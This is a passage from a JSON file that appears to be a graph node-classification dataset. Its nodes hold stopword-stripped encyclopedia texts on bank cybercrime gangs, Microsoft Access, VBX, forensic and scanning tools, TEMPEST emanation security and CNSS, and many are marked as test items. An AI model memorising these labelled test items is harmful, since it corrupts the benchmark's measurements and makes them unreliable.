computerized training pattern secure bank deletes blind spots online-payments security diagnosing signs infection remote controlling client machine identifiers compromised authorization secure portal prevents unauthorized access personal accounts personal data web users bonus accounts various fraudulent scenarios using bots competitor offers displays portal site may 2017 group-ib issued report proved connection lazarus group stole 18 mln bangladesh central bank conducted number attacks polish banks well attempted infect hundreds financial organizations 30 countries around globe including european central bank central banks russia brazil venezuela – north korea company experts made research complex technological infrastructure communications channels concealment techniques presented new evidence lazarus attribution north korea revealed details attack july 2016 group masked cyber-criminals jackpotted 34 atms operated first bank one taiwan largest banks perpetrators stole 83.27 2m usd according cctv footage thieves used cellphones trigger atms automatically dispense money group-ib experts first discover jackpotting attack tactics used cobalt gang force atms spit cash using malware group-ib released report cobalt logical attacks atms provided detailed analysis attack scheme get bank internal network hackers used spear phishing emails malicious attachment emails purported come european central bank atm maker wincor nixdorf local banks establishing control bank internal network criminals searched network segments could gain access atms workstations bank employees control atms access atms obtained uploaded specific software allowing criminals control cash dispensers february 2016 group-ib published report titled analysis attacks trading bank card systems first major successful attack trading system provoking major exchange volatility february 2015 corkow criminal group infected trading system terminal kazan-based energobank using specialized trojan software resulting trades 400 million hackers moved ruble-dollar rate 15 percent minutes moscow exchange bank claimed losses 244 million rubles 3.2 million due trades march 2016 group-ib published report activity buhtrap criminal group managed conduct 13 successful attacks russian banks total amount 1.8 billion rubles 25.7 million august 2015 february 2016 high effectiveness attacks achieved due spear phishing mailouts including sent acting central bank russia used criminals gain access corporate network criminals obtained access computers running automated working station central bank client aws cbc free software delivers payment documents behalf central bank performed fraudulent transactions acting bank attack scheme outlined report published group-ib later used perform thefts via swift buhtrap first hacker group using network worm infect overall bank infrastructure significantly increased difficulty removing malicious functions network result banks shut whole infrastructure worm able gain full control network using single infected machine late 2014 fox-it group-ib jointly released report anunak aka carbanak hacker group stolen 1 billion rubles 50 russian banks europe anunak attacked pos terminals large retail store chains data several million clients infected group performed successful thefts since early 2015 autumn 2015 novel technique targeted attacks called reverse atm attack allowed criminals steal money atms money mules criminal payment agents would deposit small sums unembossed cards legitimate accounts immediately withdrawing 'd put also took receipt atm contained payment reference number amount withdrawn information sent hackers would use data access thousands point sale terminals primarily based us czech republic create reversal operation terminal tricked bank believing withdrawal funds cancelled point sale terminal looked though goods returned payment declined whilst banks appeared atm withdrawal cancelled funds returned account though perpetrators already taken cash process repeated money remaining target atm attacks criminals managed steal 252 million rubles 3.8 million five large russian banks fraud longer perpetrated due additional security systems implemented banks assistance visa mastercard according report released group-ib march 2015 hackers self-proclaimed islamic state iraq levant isis attacked 600 russian internet resources 2014 criminals primarily defaced websites placing pictures video isis propaganda hackers believed attacked government organizations banks popular resources also galleries schools attacks chaotic massive researchers believe aimed gain experience perform reconnaissance russian internet according group-ib report attacks performed isis cyber division cyber caliphate 3 criminal groups called team system dz fallaga team global islamic caliphate totalling 40 members autumn 2013 group-ib supported investigative activity resulted arrest dmitry fedotov known nickname paunch author infamous blackhole exploit pack time used conduct 40 infections worldwide criminal sentenced 7 years prison according national legislation april 2016 2012 law enforcement agencies assistance sberbank group-ib arrested largest criminal gang russia two years group managed infect 1.5 million computers worldwide steal approximately 250 million bank accounts total 100 banks suffered attacks throughout world group-ib engaged partners netherlands canada investigation enabled company identify full chain actors including organizer owned botnet operators cashers money mules first case russia members criminal group arrested leaders sentenced 5 8 years prison year members criminal groups used carberp modifications attack individuals companies arrested summer 2012 hacker known germes aka arashi arrested creator one largest global botnets infected 6 million computers following 7 members hodprot criminal group detained one oldest russian hacker gangs known stolen approximately 125 million rubles russian bank accounts members criminal group arrested even though known used control servers located abroad – netherlands germany france usa april 2015 members hacker group infected 340,000 android-based devices steal money bank accounts arrested assistance group-ib sberbank hackers dubbed malware fifth reich used nazi symbols control system hackers distributed malware via sms messages containing link download program masked adobe flash player trojan enabled hackers intercept sms notifications banks furtively confirm money transfer hackers accounts attack scheme similar used waplook first criminal group members arrested money theft individuals using malicious mobile apps russia group leaders arrested september 2014 assistance group-ib may 2017 russian ministry internal affairs announced arrest cron gang infected 1 mln smartphones group-ib provided expert support investigation cron banking trojan spread two ways—via sms user clicked link message installed malicious application disguised legitimate application navitel framaroot pornhub avito etc hackers infected 3,500 smartphones daily managed steal 1 mln total june 2015 twin brother hackers reportedly arrested st. petersburg russia part police operation assisted group-ib 4 years popelysh brothers stolen money client accounts vtb24 online banking using fake bank page grab client data first case russia legal proceedings taken criminals using phishing schemes",
    "neighbors": [
      2432,
      10756,
      2154,
      9293,
      10190,
      4945,
      3858,
      4083,
      4883,
      4979,
      5563,
      7515,
      11476,
      7418,
      3323,
      8668
    ],
    "mask": "Test"
  },
  {
    "node_id": 7523,
    "label": 1,
    "text": "Microsoft_Access:microsoft access microsoft access database management system dbms microsoft combines relational microsoft jet database engine graphical user interface software-development tools member microsoft office suite applications included professional higher editions sold separately microsoft access stores data format based access jet database engine also import link directly data stored applications databases software developers data architects power users use microsoft access develop application software like microsoft office applications access supported visual basic applications vba object-based programming language reference variety objects including legacy dao data access objects activex data objects many activex components visual objects used forms reports expose methods properties vba programming environment vba code modules may declare call windows operating system operations prior introduction access borland paradox dbase fox foxpro dominated desktop database market microsoft access first mass-market database program windows microsoft purchase foxpro 1992 incorporation fox rushmore query optimization routines access microsoft access quickly became dominant database windows effectively eliminating competition failed transition ms-dos world microsoft first attempt sell relational database product mid 1980s microsoft obtained license sell late 1980s microsoft developed solution codenamed omega confirmed 1988 database product windows os/2 development going include eb embedded basic language going language writing macros microsoft applications unification macro languages happen introduction visual basic applications vba omega also expected provide front end microsoft sql server application resource-hungry reports working slowly 386 processors available time scheduled released 1st quarter 1990 1989 development product reset rescheduled delivered sooner january 1991 parts project later used microsoft projects cirrus codename access thunder codename visual basic embedded basic engine used access premiere omega project demonstrated 1992 several journalists included features available access omega project scrapped developers assigned cirrus project assigned team created visual basic goal create competitor applications like paradox dbase would work windows microsoft acquired foxpro rumors microsoft project might get replaced company decided develop parallel assumed project would make use extensible storage engine jet blue end support microsoft jet database engine jet red provided project used code omega project pre-release version visual basic july 1992 betas cirrus shipped developers name access became official name product access originally used older terminal emulation program microsoft years program abandoned decided reuse name 1992 microsoft released access version 1.0 november 13 1992 access 1.1 release may 1993 improve compatibility microsoft products include access basic programming language 1994 microsoft specified minimum hardware requirements access v2.0 microsoft windows v3.1 4 mb ram required 6 mb ram recommended 8 mb available hard disk space required 14 mb hard disk space recommended product shipped seven 1.44 mb diskettes manual shows 1994 copyright date office 95 microsoft access 7.0 a.k.a access 95 became part microsoft office professional suite joining microsoft excel word powerpoint transitioning access basic vba since microsoft released new versions microsoft access release microsoft office includes access 97 version 8.0 access 2000 version 9.0 access 2002 version 10.0 access 2003 version 11.5 access 2007 version 12.0 access 2010 version 14.0 access 2013 version 15.0 versions 3.0 3.5 microsoft jet database engine used access 7.0 later-released access 97 respectively critical issue made versions access unusable computer 1 gb memory microsoft fixed problem jet 3.5/access 97 post-release never fixed issue jet 3.0/access 95 native access database format jet mdb database also evolved years formats include access 1.0 1.1 2.0 7.0 97 2000 2002 2007 significant transition access 97 access 2000 format backward compatible earlier versions access newer versions access support access 2000 format new features added access 2002 format used access 2002 2003 2007 2010 microsoft access 2000 increased maximum database size 2gb 1gb access 97 microsoft access 2007 introduced new database format accdb supports links sharepoint lists complex data types multivalue attachment fields new field types essentially recordsets fields allow storage multiple values files one field microsoft access 2007 also introduced file attachment field stored data efficiently ole object linking embedding field microsoft access 2010 introduced new version accdb format supported hosting access web solutions sharepoint 2010 server first time allowed access solutions run without install access pc first support mac users user sharepoint site sufficient rights could use access web solution copy access still required developer create access web solution desktop version access remained part access 2010 access web solutions desktop solutions automation macro language vba access automatically converted javascript data longer access database sharepoint lists access desktop database could link sharepoint data hybrid applications possible sharepoint users needing basic views edits could supported sophisticated traditional solutions could remain desktop access database microsoft access 2013 offers traditional access desktop solutions plus significantly updated sharepoint 2013 web solution access web model access 2010 replaced new architecture stores data actual sql server databases unlike sharepoint lists offers true relational database design referential integrity scalability extensibility performance one would expect sql server database solutions created sharepoint 2013 offer modern user interface designed display multiple levels relationships viewed edited along resizing different devices support touch access 2013 desktop similar access 2010 several features discontinued including support access data projects adps pivot tables pivot charts access data collections source code control replication legacy features access desktop database maximum size remained 2gb since 2000 version addition using database storage file microsoft access also may used 'front-end program products act 'back-end tables microsoft sql server non-microsoft products oracle sybase multiple backend sources used microsoft access jet database accdb mdb formats similarly applications visual basic asp.net visual studio .net use microsoft access database format tables queries microsoft access may also part complex solution may integrated technologies microsoft excel microsoft outlook microsoft word microsoft powerpoint activex controls access tables support variety standard field types indices referential integrity including cascading updates deletes access also includes query interface forms display enter data reports printing underlying jet database contains objects multi-user handles record-locking repetitive tasks automated macros point-and-click options also easy place database network multiple users share update data without overwriting work data locked record level significantly different excel locks entire spreadsheet template databases within program download microsoft website options available upon starting access allow users enhance database predefined tables queries forms reports macros database templates support vba code microsoft templates include vba code programmers create solutions using vba similar visual basic 6.0 vb6 used throughout microsoft office programs excel word outlook powerpoint vb6 code including use windows api calls used vba power users developers extend basic end-user solutions professional solution advanced automation data validation error trapping multi-user support number simultaneous users supported depends amount data tasks performed level use application design generally accepted limits solutions 1 gb less data access supports 2 gb performs quite well 100 fewer simultaneous connections 255 concurrent users supported capability often good fit department solutions using access database solution multi-user scenario application split means tables one file called back end typically stored shared network folder application components forms reports queries code macros linked tables another file called front end linked tables front end point back end file user access application would receive copy front end file applications run complex queries analysis across large datasets would naturally require greater bandwidth memory microsoft access designed scale support data users linking multiple access databases using back-end database like microsoft sql server latter design amount data users scale enterprise-level solutions microsoft access role web development prior version 2010 limited user interface features access forms reports work windows versions 2000 2003 access object type called data access pages created publishable web pages data access pages longer supported microsoft jet database engine core access accessed technologies odbc ole db data i.e. tables queries accessed web-based applications developed asp.net php java use microsoft terminal services remote desktop application windows server 2008 r2 organizations host access applications run web technique scale way web application would appropriate limited number users depending configuration host access 2010 allows databases published sharepoint 2010 web sites running access services web-based forms reports run modern web browser resulting web forms reports accessed via web browser n't require add-ins extensions e.g activex silverlight access 2013 create web applications directly sharepoint 2013 sites running access services access 2013 web solutions store data underlying sql server database much scalable robust access 2010 version used sharepoint lists store data access services sharepoint since retired compiled version access database file extensions .mde /accde .ade accde works access 2007 later created prevent user accessing design surfaces modify module code forms reports mde ade file microsoft access database file modules compiled editable source code removed .mde .ade versions access database used end-user modifications allowed application ’ source code kept confidential microsoft also offers developer extensions download help distribute access 2007 applications create database templates integrate source code control microsoft visual sourcesafe users create tables queries forms reports connect together macros advanced users use vba write rich solutions advanced data manipulation user control access also report creation features work data source access access original concept access end users able access data source features include import export data many formats including excel outlook ascii dbase paradox foxpro sql server oracle also ability link data existing location use viewing querying editing reporting allows existing data change ensuring access uses latest data perform heterogeneous joins data sets stored across different platforms access often used people downloading data enterprise level databases manipulation analysis reporting locally also jet database format mdb accdb access 2007 contain application data one file makes convenient distribute entire application another user run disconnected environments one benefits access programmer perspective relative compatibility sql structured query language — queries viewed graphically edited sql statements sql statements used directly macros vba modules manipulate access tables users mix use vba macros programming forms logic offers object-oriented possibilities vba also included queries microsoft access offers parameterized queries queries access tables referenced programs like vb6 .net dao ado microsoft access vba reference parameterized stored procedures via ado desktop editions microsoft sql server used access alternative jet database engine support started msde microsoft sql server desktop engine scaled version microsoft sql server 2000 continues sql server express versions sql server 2005 2008 microsoft access file server-based database unlike client–server relational database management systems rdbms microsoft access implement database triggers stored procedures transaction logging access 2010 includes table-level triggers stored procedures built ace data engine thus client-server database system requirement using stored procedures table triggers access 2010 tables queries forms reports macros developed specifically web based applications access 2010 integration microsoft sharepoint 2010 also highly improved 2013 edition microsoft access introduced mostly flat design ability install apps office store introduce new features theme partially updated 2016 dark theme created access asp.net web forms query microsoft access database retrieve records display browser sharepoint server 2010 via access services allows access 2010 databases published sharepoint thus enabling multiple users interact database application standards-compliant web browser access web databases published sharepoint server use standard objects tables queries forms macros reports access services stores objects sharepoint access 2013 offers ability publish access web solutions sharepoint 2013 rather using sharepoint lists data source access 2013 uses actual sql server database hosted sharepoint sql azure offers true relational database referential integrity scalability maintainability extensibility compared sharepoint views access 2010 used macro language enhanced support sophisticated programming logic database level automation microsoft access also import link directly data stored applications databases microsoft office access 2007 newer import link microsoft offers free runtime versions microsoft access allow users run access desktop application without needing purchase install retail version microsoft access allows access developers create databases freely distributed unlimited number end-users runtime versions access 2007 later downloaded free microsoft runtime versions access 2003 earlier part office developer extensions/toolkit required separate purchase runtime version allows users view edit delete data along running queries forms reports macros vba module code runtime version allow users change design microsoft access tables queries forms reports macros module code runtime versions similar corresponding full version access usually compatible earlier versions example access runtime 2010 allows user run access application made 2010 version well 2007 2000 due deprecated features access 2013 runtime version also unable support older features development one simulate runtime environment fully functional version using codice_1 command line option access stores database tables queries forms reports macros modules access jet database single file query development access offers query designer graphical user interface allows users build queries without knowledge structured query language query designer users show datasources query tables queries select fields want returned clicking dragging grid one set joins clicking dragging fields tables fields tables access allows users view manipulate sql code desired access table including linked tables different data sources used query access also supports creation pass-through queries snippets sql code address external data sources use odbc connections local machine enables users interact data stored outside access program without using linked tables jet users construct pass-through queries using sql syntax supported external data source developing reports design view additions changes controls cause linked queries execute background designer forced wait records returned able make another change feature turned non-programmers use macro feature automate simple tasks series drop-down selections macros allow users easily chain commands together running queries importing exporting data opening closing forms previewing printing reports etc macros support basic logic if-conditions ability call macros macros also contain sub-macros similar subroutines access 2007 enhanced macros included error-handling support temporary variables access 2007 also introduced embedded macros essentially properties object event eliminated need store macros individual objects however macros limited functionality lack programming loops advanced coding logic access 2013 significant enhancements introduced access 2013 capabilities macros became fully comparable vba made feature rich web-based application deployments practical via greatly enhanced microsoft sharepoint interface tools well traditional windows desktops common products microsoft office suite programming language used access microsoft vba similar visual basic 6.0 vb6 code stored modules classes code behind forms reports create richer efficient maintainable finished product good error handling professional access applications developed using vba programming language rather macros except web deployment business requirement manipulate data tables queries vba macros microsoft provides two database access libraries com components well dao ado developers also use ole db odbc developing native c/c++ programs access adps direct manipulation sql server data ado required dao appropriate managing data access/jet databases way manipulate complex field types accdb tables database container navigation pane access 2007 later versions system automatically categorizes object type e.g. table query macro many access developers use leszynski naming convention though universal programming convention dbms-enforced rule particularly helpful vba references object names may indicate data type e.g tbl tables qry queries developers deploy microsoft access often individual workgroup projects access 97 speed characterization done 32 users since access 97 access 2003 2007 microsoft access hardware evolved significantly databases 1 gb size fit entirely ram 200 simultaneous users well within capabilities microsoft access course performance depends database design tasks disk-intensive work complex searching querying take time data microsoft access database cached ram processing speed may substantially improve single user data changing past effect packet latency record-locking system caused access databases run slowly virtual private network vpn wide area network wan jet database broadband connections mitigated issue performance also enhanced continuous connection maintained back-end database throughout session rather opening closing table access access database performance vpn wan suffers client using remote desktop protocol microsoft terminal services provide effective solution access databases linked sql server access data projects work well vpns wans july 2011 microsoft acknowledged intermittent query performance problem versions access windows 7 windows server 2008 r2 due nature resource management vastly different newer operating systems issue severely affects query performance access 2003 earlier jet database engine code well access 2007 later access database engine ace microsoft issued hotfixes kb2553029 access 2007 kb2553116 access 2010 fix issue jet 4.0 mainstream support earlier versions microsoft access ability distribute applications required purchase developer toolkit access 2007 2010 access 2013 runtime version offered free download making distribution royalty-free applications possible windows xp vista 7 windows 8.x microsoft access applications adopt split-database architecture single database divided separate back-end file contains data tables shared file server front-end containing application objects queries forms reports macros modules front-end access application distributed user desktop linked shared database using approach user copy microsoft access runtime version installed machine along application database reduces network traffic since application retrieved use front-end database still contain local tables storing user settings temporary data split-database design also allows development application independent data one disadvantage users may make various changes local copy application makes hard manage version control new version ready front-end database replaced without impacting data database microsoft access two built-in utilities database splitter linked table manager facilitate architecture linked tables access use absolute paths rather relative paths development environment either path production environment dynamic-linker routine written vba large access databases may performance issues sql backend considered circumstances less issue entire database fit pc ram since access caches data indexes scale access applications enterprise web solutions one possible technique involves migrating microsoft sql server equivalent server database client–server design significantly reduces maintenance increases security availability stability transaction logging access 2000 access 2010 included feature called upsizing wizard allowed users upgrade databases microsoft sql server odbc client–server database feature removed access 2013 additional solution sql server migration assistant access ssma continues available free download microsoft variety upgrading options available migrating data queries sql server access database linked sql database however certain data types problematic notably yes/no microsoft access three states yes/no true/false data type empty no/false zero yes/true -1 corresponding sql server data type binary two states permissible values zero 1 regardless sql server still easiest migration retrieving data linked tables optimized records needed scenario may operate less efficiently would otherwise optimal sql server example instances multi-table joins still require copying whole table across network previous versions access including access 2010 databases also converted access data projects adp tied directly one sql server database feature removed access 2013 adp support ability directly create modify sql server objects tables views stored procedures sql server constraints views stored procedures significantly reduce network traffic multi-table joins sql server supports temporary tables links data sources beyond single sql server database finally access databases completely replaced another technology asp.net java data converted however migration may dictate major effort since access sql language powerful superset standard sql access application procedures whether vba macros written relatively higher level versus currently available alternatives robust comprehensive note access macro language allowing even higher level abstraction vba significantly enhanced access 2010 access 2013 many cases developers build direct web-to-data interfaces using asp.net keeping major business automation processes administrative reporting functions n't need distributed everyone access information workers maintain access data migrate sql server directly queries migrate successfully situations may need translate vba functions user defined functions t–sql .net functions procedures crosstab queries migrated sql server using pivot command microsoft access applications made secure various methods basic password access control relatively weak form protection higher level protection use workgroup security requiring user name password users groups specified along rights object type individual object level used specify people read-only data entry rights may challenging specify separate workgroup security file contains settings used manage multiple databases workgroup security supported access 2007 access 2010 accdb database format although access 2007 access 2010 still support mdb databases databases also encrypted accdb format offers significantly advanced encryption previous versions additionally database design needs secured prevent changes access databases locked/protected source code compiled converting database .mde file changes vba project modules forms reports need made original mdb reconverted mde access 2007 access 2010 accdb database converted accde file tools available unlocking decompiling although certain elements including original vba comments formatting normally irretrievable microsoft access saves information following file formats access versions 2.0 7.0 office 95 version launched word 7 office 95 products ole 2 capabilities access 7 shows compatible word 7 version number 13 skipped",
    "neighbors": [
      4614,
      522,
      6166,
      8227,
      5669,
      8230,
      4647,
      10286,
      6709,
      2046,
      5691,
      9286,
      72,
      2632,
      4680,
      8781,
      83,
      608,
      10848,
      8804,
      10340,
      10342,
      8808,
      9328,
      5749,
      10358,
      2681,
      5242,
      641,
      2183,
      6797,
      10899,
      10900,
      10389,
      10902,
      11414,
      3224,
      11422,
      10413,
      3250,
      8393,
      2780,
      736,
      3303,
      242,
      8434,
      11515,
      8458,
      11025,
      11030,
      5401,
      5403,
      11551,
      11559,
      10026,
      10029,
      7983,
      11570,
      315,
      321,
      5953,
      847,
      3413,
      1366,
      8539,
      2399,
      2401,
      1383,
      7022,
      3951,
      1904,
      9075,
      2943,
      11144,
      2456,
      7064,
      10145,
      3496,
      7080,
      4010,
      5549,
      10157,
      11191,
      440,
      8644,
      460,
      9166,
      10193,
      9177,
      987,
      1501,
      479,
      6633,
      4074,
      2031,
      2544,
      5619,
      3573,
      9205,
      10747,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 7524,
    "label": 2,
    "text": "Visual_Basic_Extension:visual basic extension computer programming visual basic extension commonly abbreviated vbx custom control component model used microsoft visual basic versions 1.0 3.0 still supported 16-bit version version 4.0 made obsolete ocxs vbx also supported first 16-bit version borland delphi vbx specification created developers could extend visual basic since time visual basic interpreted language limited speed vbxs often written c c++ provided ability create powerful efficient user interface sub-components could assembled applications using visual basic glue visual basic 4.0 added support newer ole controls ocxs became activex controls implicitly deprecating vbx controls ocxs based component object model version visual basic come many controls incorporating vbx controls visual basic microsoft spawned first commercially viable market reusable software components third parties created large market custom controls resale vbx components called custom controls microsoft development team envisioned visual control components like toggle switch button enterprising third party software component developers saw opportunities use vbx specification non-visual components components creating zip files manipulating low-level system settings communicating tcp/ip",
    "neighbors": [
      5395,
      10029,
      847
    ],
    "mask": "Test"
  },
  {
    "node_id": 7525,
    "label": 4,
    "text": "Forensic_Toolkit:forensic toolkit forensic toolkit ftk computer forensics software made accessdata scans hard drive looking various information example locate deleted emails scan disk text strings use password dictionary crack encryption toolkit also includes standalone disk imaging program called ftk imager tool saves image hard disk one file segments may later reconstructed calculates md5 hash values confirms integrity data closing files result image file saved several formats including dd raw accessdata forensic toolkit version 5.5",
    "neighbors": [
      2437,
      7557,
      1801,
      6797,
      5010,
      4500,
      8469,
      3099,
      7968,
      6177,
      1315,
      5284,
      11182,
      7983,
      10290,
      4789,
      2231,
      4408,
      8635,
      2494,
      830,
      7369,
      6475,
      10189,
      4049,
      4834,
      5475,
      9319,
      7160,
      11642
    ],
    "mask": "Test"
  },
  {
    "node_id": 7526,
    "label": 4,
    "text": "W3af:w3af w3af web application attack audit framework open-source web application security scanner project provides vulnerability scanner exploitation tool web applications provides information security vulnerabilities use penetration testing engagements scanner offers graphical user interface command-line interface w3af divided two main parts core plug-ins core coordinates process provides features consumed plug-ins find vulnerabilities exploit plug-ins connected share information using knowledge base plug-ins categorized discovery audit grep attack output mangle evasion bruteforce w3af started andres riancho march 2007 many years development community july 2010 w3af announced sponsorship partnership rapid7 rapid7 sponsorship project able increase development speed keep growing terms users contributors",
    "neighbors": [
      899,
      5636,
      1926,
      1803,
      3473,
      3604,
      1429,
      2084,
      10412,
      7983,
      11567,
      823,
      7228,
      9293,
      4689,
      1369,
      4198,
      8554,
      10492,
      2558,
      9727
    ],
    "mask": "None"
  },
  {
    "node_id": 7527,
    "label": 4,
    "text": "Tempest_(codename):tempest codename tempest u.s. national security agency specification nato certification referring spying information systems leaking emanations including unintentional radio electrical signals sounds vibrations tempest covers methods spy upon others shield equipment spying protection efforts also known emission security emsec subset communications security comsec nsa methods spying computer emissions classified protection standards released either nsa department defense protecting equipment spying done distance shielding filtering masking tempest standards mandate elements equipment distance walls amount shielding buildings equipment distance separating wires carrying classified vs. unclassified materials filters cables even distance shielding wires equipment building pipes noise also protect information masking actual data much tempest leaking electromagnetic emanations also encompasses sounds mechanical vibrations example possible log user keystrokes using motion sensor inside smartphones compromising emissions defined unintentional intelligence-bearing signals intercepted analyzed side-channel attack may disclose information transmitted received handled otherwise processed information-processing equipment world war ii bell telephone supplied u.s. military device called 131-b2 mixer encrypted teleprinter signals xor ’ ing key material one-time tapes sigtot system rotor based key generator called sigcum used electromechanical relays operation later bell informed signal corps able detect electromagnetic spikes distance mixer recover plain text meeting skepticism phenomenon discovered laboratory could really dangerous demonstrated ability recover plain text signal corps ’ crypto center varick st lower manhattan alarmed signal corps asked bell investigate identified three problem areas radiated signals signals conducted wires coming facility magnetic fields suggested shielding filtering masking possible solutions bell developed modified mixer 131-a1 shielding filtering proved difficult maintain expensive deploy instead relevant commanders warned problem advised control 100 feet diameter zone around communications center prevent covert interception things left 1951 cia rediscovered problem 131-b2 mixer found could recover plain text line carrying encrypted signal quarter mile away filters signal power lines developed control zone extended 200 feet based commanders could expected accomplish technical criteria long process evaluating systems developing possible solutions followed compromising effects discovered fluctuations power line rotors stepped question exploiting noise electromechanical encryption systems raised late 1940 ’ re-evaluated possible threat acoustical emanations could reveal plain text pick device close source bad news even mediocre microphones would soundproofing room made problem worse removing reflections providing cleaner signal recorder 1956 naval research laboratory developed better mixer operated much lower voltages currents therefore radiated far less incorporated newer nsa encryption systems however many users needed higher signal levels drive teleprinters greater distances multiple teleprinters connected newer encryption devices included higher level signal option nsa began developing techniques specifications filtering shielding grounding separating conductors carried sensitive plain text lines might leave secure environment red/black separation dogma 1958 joint policy called nag-1 set radiation standards equipment installations based 50 foot limit control also specified classification levels various aspects tempest problem policy adopted canada uk next year six organizations navy army air force nsa cia state department bulk work difficulties implementation quickly emerged computer processing intelligence data becoming important computers peripherals evaluated many proved problematical friden flexowriter popular i/o typewriter time proved among strongest emitters readable far 3,200 feet field tests u.s. communications security board uscsb produced flexowriter policy banned use overseas classified information limited use confidential level u.s. within 400 foot security zone users found policy onerous impractical later nsa found similar problems introduction cathode ray tube crt displays also powerful radiators multi-year process moving policy recommendations strictly enforced tempest rules resulting directive coordinated 22 separate agencies 5200.19 signed secretary defense robert mcnamara december 1964 still took years fully implement nsa ’ formal implementation took effect june 1966 meanwhile problem acoustic emanations became critical discovery 900 microphones u.s. installations overseas behind iron curtain responses build room-within-a-room enclosures transparent nicknamed fish bowl units fully shielded contain electronic emanations unpopular personnel supposed work inside calling meat lockers sometimes left door open none less installed critical locations embassy moscow two one state department use one military attaches unit installed nsa key generation equipment cost 134,000 tempest standards continued evolve 1970s later newer testing methods nuanced guidelines took account risks specific locations situations security needs often met resistance according nsa david g. boak still hear today circles rigorous technical standards whittled interest money time frighteningly reminiscent arrogant third reich enigma cryptomachine many specifics tempest standards classified elements public current united states nato tempest standards define three levels protection requirements additional standards include nsa department defense declassified tempest elements freedom information act requests documents black many key values descriptions declassified version tempest test standard heavily redacted emanation limits test procedures blacked redacted version introductory tempest handbook nacsim 5000 publicly released december 2000 additionally current nato standard sdip-27 2006 known amsg 720b amsg 788a amsg 784 still classified despite declassified documents give information shielding required tempest standards example military handbook 1195 includes chart right showing electromagnetic shielding requirements different frequencies declassified nsa specification shielded enclosures offers similar shielding values requiring minimum 100 db insertion loss 1 khz 10 ghz since much current requirements still classified publicly available correlations 100 db shielding requirement newer zone-based shielding standards addition many separation distance requirements elements provided declassified nsa red-black installation guidance nstissam tempest/2-95 information-security agencies several nato countries publish lists accredited testing labs equipment passed tests united states army also tempest testing facility part u.s. army information systems engineering command fort huachuca arizona similar lists facilities exist nato countries tempest certification must apply entire systems individual components since connecting single unshielded component cable device otherwise secure system could dramatically alter system rf characteristics tempest standards require red/black separation i.e. maintaining distance installing shielding circuits equipment used handle plaintext classified sensitive information encrypted red secured circuits equipment black latter including carrying encrypted signals manufacture tempest-approved equipment must done careful quality control ensure additional units built exactly units tested changing even single wire invalidate tests one aspect tempest testing distinguishes limits spurious emissions e.g fcc part 15 requirement absolute minimal correlation radiated energy detectable emissions plaintext data processed 1985 wim van eck published first unclassified technical analysis security risks emanations computer monitors paper caused consternation security community previously believed monitoring highly sophisticated attack available governments van eck successfully eavesdropped real system range hundreds metres using 15 worth equipment plus television set consequence research emanations sometimes called van eck radiation eavesdropping technique van eck phreaking although government researchers already aware danger bell labs noted vulnerability secure teleprinter communications world war ii able produce 75 plaintext processed secure facility distance 80 feet 24 metres additionally nsa published tempest fundamentals nsa-82-89 nacsim 5000 national security agency classified february 1 1982 addition van eck technique successfully demonstrated non-tempest personnel korea korean war 1950s markus kuhn discovered several low-cost techniques reducing chances emanations computer displays monitored remotely crt displays analog video cables filtering high-frequency components fonts rendering computer screen attenuate energy text characters broadcast modern flat panel displays high-speed digital serial interface dvi cables graphics controller main source compromising emanations adding random noise least significant bits pixel values may render emanations flat-panel displays unintelligible eavesdroppers secure method since dvi uses certain bit code scheme tries transport balanced signal 0 bits 1 bits may much difference two pixel colors differ much color intensity emanations differ drastically even last bit pixel color changed signal received eavesdropper also depends frequency emanations detected signal received many frequencies frequency signal differs contrast brightness related certain color screen usually technique smothering red signal noise effective unless power noise sufficient drive eavesdropper receiver saturation thus overwhelming receiver input led indicators computer equipment source compromising optical emanations one technique involves monitoring lights dial-up modem almost modems flash led show activity common flashes directly taken data line fast optical system easily see changes flickers data transmitted wire recent research shown possible detect radiation corresponding keypress event wireless radio keyboards also traditional wired keyboards even laptop keyboards 1970s onward soviet bugging us embassy ibm selectric typewriters allowed keypress-derived mechanical motion bails attached magnets detected implanted magnetometers converted via hidden electronics digital radio frequency signal eight character transmission provided soviet access sensitive documents typed us facilities moscow leningrad 2014 researchers introduced airhopper bifurcated attack pattern showing feasibility data exfiltration isolated computer nearby mobile phone using fm frequency signals 2015 bitwhisper covert signaling channel air-gapped computers using thermal manipulations introduced bitwhisper supports bidirectional communication requires additional dedicated peripheral hardware later 2015 researchers introduced gsmem method exfiltrating data air-gapped computers cellular frequencies transmission generated standard internal bus renders computer small cellular transmitter antenna february 2018 research published describing low frequency magnetic fields used escape sensitive data faraday-caged air-gapped computers malware code-named ’ odini ’ control low frequency magnetic fields emitted infected computers regulating load cpu cores",
    "neighbors": [
      7424,
      9857,
      4,
      9233,
      150,
      10909,
      8356,
      4389,
      9640,
      11432,
      3629,
      11695,
      7090,
      1083,
      2558,
      4807,
      6344,
      7887,
      7635,
      11349,
      1121,
      5986,
      2403,
      7652,
      5110,
      8574
    ],
    "mask": "None"
  },
  {
    "node_id": 7528,
    "label": 4,
    "text": "Committee_on_National_Security_Systems:committee national security systems committee national security systems cnss united states intergovernmental organization sets policy security us security systems national security telecommunications information systems security committee nstissc established national security directive 42 national policy security national security telecommunications information systems dated 5 july 1990 october 16 2001 president george w. bush signed executive order 13231 critical infrastructure protection information age re-designating national security telecommunications information systems security committee nstissc committee national security systems cnss holds discussions policy issues sets national policy directions operational procedures guidance information systems operated u.s. government contractors agents either contain classified information involve intelligence activities involve cryptographic activities related national security involve command control military forces involve equipment integral part weapon weapons system critical direct fulfillment military intelligence missions department defense chairs committee membership consists representatives 21 u.s. government departments agencies voting privileges include cia dia dod doj fbi nsa national security council united states military services members voting committee include disa nga nist nro operating agency cnss appears national security agency serves primary contact public inquiries cnss defines several standards include standards training security current certifications include",
    "neighbors": [
      3552,
      9088,
      5636,
      999,
      4798,
      5774,
      7887,
      8462,
      4689,
      8881,
      7388,
      5780,
      1369,
      10170,
      316,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7529,
    "label": 6,
